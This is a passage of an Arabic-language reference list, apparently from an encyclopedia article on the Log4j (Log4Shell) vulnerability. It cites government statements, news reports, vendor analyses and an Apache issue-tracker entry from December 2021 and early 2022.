  59. «بيان من وزير الدفاع الوطني بشأن ثغرة أباتشي ودعوة للمنظمات الكندية لاتخاذ إجراءات عاجلة» . حكومة كندا . ١٢ ديسمبر ٢٠٢١. مؤرشف من الأصل في ٢٠ ديسمبر ٢٠٢١. تم الاطلاع عليه في ١٢ ديسمبر ٢٠٢١ .
  60. كابريرا، هولي (12 ديسمبر 2021). "مواجهة تهديدات الأمن السيبراني، كيبيك تغلق مواقع حكومية للتقييم" . سي بي سي نيوز . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  61. ستوب، كاثرين (21 ديسمبر 2021). "قراصنة يستغلون ثغرة في Log4j بوزارة الدفاع البلجيكية" . صحيفة وول ستريت جورنال. مؤرشف من الأصل في 7 فبراير 2022. تم الاطلاع عليه في 14 فبراير 2022 .{{cite web}}: CS1 maint: bot: حالة عنوان URL الأصلي غير معروفة ( رابط )
  62. "ثغرة في Apache Log4j: وزارة الصناعة الصينية تسحب دعمها من Alibaba Cloud لعدم إبلاغها الحكومة أولاً عن الثغرة" . 22 ديسمبر 2021.
  63. تونغ، ليام. "مستويات هجمات ثغرات Log4j لا تزال مرتفعة، مايكروسوفت تحذر" . ZDNet . تم الاطلاع عليه في 5 يناير 2022 .
  64. 1 2 براي، هياواثا (15 ديسمبر 2021). "ثغرة برمجية جديدة في Log4j تثير قلقًا عالميًا بشأن الهجمات الإلكترونية - صحيفة بوسطن غلوب" . صحيفة بوسطن غلوب . تم الاطلاع عليه بتاريخ 17 ديسمبر 2021 .
  65. "تم فحص ما يقرب من نصف الشبكات بحثًا عن نقاط ضعف Log4Shell" . ComputerWeekly . 14 ديسمبر 2021.
  66. "الأرقام وراء جائحة إلكترونية - دراسة معمقة" . شركة تشيك بوينت للبرمجيات . 13 ديسمبر 2021.
  67. "LOG4J2-3201: تقييد البروتوكولات التي يمكن لـ JNDI استخدامها وتقييد LDAP" . نظام تتبع المشكلات JIRA التابع لمؤسسة أباتشي . تم الاطلاع عليه بتاريخ 14 ديسمبر 2021 .
  68. مناشيه، شاشار (13 ديسمبر 2021). "ثغرة Log4Shell الأمنية من نوع 0-Day: كل ما تحتاج لمعرفته" . مدونة JFrog . تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  69. "داخل السباق لإصلاح خلل برمجي كارثي محتمل" . Bloomberg.com . 13 ديسمبر 2021.